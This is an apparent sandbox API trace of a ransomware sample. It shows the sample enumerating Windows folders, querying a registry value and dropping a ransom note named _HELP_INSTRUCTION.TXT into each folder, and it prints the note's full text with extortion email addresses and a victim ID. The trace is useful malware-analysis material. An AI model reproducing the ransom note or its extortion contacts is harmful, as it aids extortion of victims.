[0160.847] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0160.847] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0160.847] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.847] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0160.847] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0160.847] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.847] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0160.847] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\*.*" | out: lpString1="C:\\Boot\\*.*") returned="C:\\Boot\\*.*" [0160.847] SetErrorMode (uMode=0x1) returned 0x1 [0160.847] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Boot\\_HELP_INSTRUCTION.TXT") returned 29 [0160.847] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.848] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.848] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.848] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43754e8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x43754e8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.848] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.848] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.848] CreateFileW (lpFileName="C:\\Boot\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\boot\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0160.848] CloseHandle (hObject=0x1d4) returned 1 [0160.848] FindFirstFileW (in: lpFileName="C:\\Boot\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.848] PathFindFileNameW (pszPath="C:\\Boot") returned="Boot" [0160.848] lstrcpyW (in: lpString1=0x17e824, lpString2="Boot" | out: lpString1="Boot") returned="Boot" [0160.848] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.848] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.849] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.849] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0160.849] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0160.849] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.849] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.849] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0160.849] SetErrorMode (uMode=0x1) returned 0x1 [0160.849] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0160.849] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0160.849] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Config.Msi\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0160.849] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0160.849] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.849] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.849] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0160.849] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\*.*" | out: lpString1="C:\\Config.Msi\\*.*") returned="C:\\Config.Msi\\*.*" [0160.849] SetErrorMode (uMode=0x1) returned 0x1 [0160.849] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT") returned 35 [0160.849] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.849] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.849] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.849] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4375718, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x4375718*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.850] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.850] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.850] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.850] CreateFileW (lpFileName="C:\\Config.Msi\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\config.msi\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.850] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.850] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.850] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.850] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0160.850] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0160.850] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.850] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.850] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0160.850] SetErrorMode (uMode=0x1) returned 0x1 [0160.850] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0160.850] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0160.850] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Documents and Settings\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0160.850] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0160.850] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.850] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.850] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0160.850] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\*.*" | out: lpString1="C:\\Documents and Settings\\*.*") returned="C:\\Documents and Settings\\*.*" [0160.850] SetErrorMode (uMode=0x1) returned 0x1 [0160.851] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT") returned 47 [0160.851] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.851] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.851] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.851] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4375948, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x4375948*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.851] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.851] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.851] CreateFileW (lpFileName="C:\\Documents and Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\documents and settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0160.851] CloseHandle (hObject=0x1d4) returned 1 [0160.851] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.851] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.851] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.851] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.851] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0160.852] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0160.852] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.852] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.852] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0160.852] SetErrorMode (uMode=0x1) returned 0x1 [0160.852] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0160.852] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0160.852] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0160.852] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0160.852] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.852] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.852] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0160.852] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*" [0160.852] SetErrorMode (uMode=0x1) returned 0x1 [0160.852] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\MSOCache\\_HELP_INSTRUCTION.TXT") returned 33 [0160.852] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.852] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.852] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.852] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb9768, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cb9768*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.852] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.853] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.853] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.853] CreateFileW (lpFileName="C:\\MSOCache\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\msocache\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.853] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.853] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.853] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.853] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.853] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0160.853] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0160.853] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.853] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.853] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0160.853] SetErrorMode (uMode=0x1) returned 0x1 [0160.853] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0160.853] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0160.853] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0160.853] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0160.853] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.853] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.853] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs" [0160.853] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*" [0160.853] SetErrorMode (uMode=0x1) returned 0x1 [0160.853] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT") returned 33 [0160.854] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.854] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.854] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.854] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb9998, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cb9998*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.854] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0160.854] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0160.854] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.854] CreateFileW (lpFileName="C:\\PerfLogs\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\perflogs\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.854] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0xffffffff [0160.854] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0160.854] FindNextFileW (in: hFindFile=0x4372378, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0160.854] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0160.854] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0160.854] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0160.855] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0160.855] lstrcatW (in: lpString1="C:\\", lpString2="Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0160.855] SetErrorMode (uMode=0x1) returned 0x1 [0160.855] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0160.855] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0160.855] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\" [0160.855] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0160.855] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43723b8 [0160.855] PathFindFileNameW (pszPath="C:\\Program Files") returned="Program Files" [0160.855] lstrcpyW (in: lpString1=0x17e824, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0160.855] FindClose (in: hFindFile=0x43723b8 | out: hFindFile=0x43723b8) returned 1 [0160.855] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0160.855] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*" [0160.855] SetErrorMode (uMode=0x1) returned 0x1 [0160.855] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Program Files\\_HELP_INSTRUCTION.TXT") returned 38 [0160.855] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0160.855] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0160.855] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1d4) returned 0x0 [0160.856] RegQueryValueExW (in: hKey=0x1d4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb9bc8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cb9bc8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0160.856] RegCloseKey (hKey=0x1d4) returned 0x0 [0160.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as 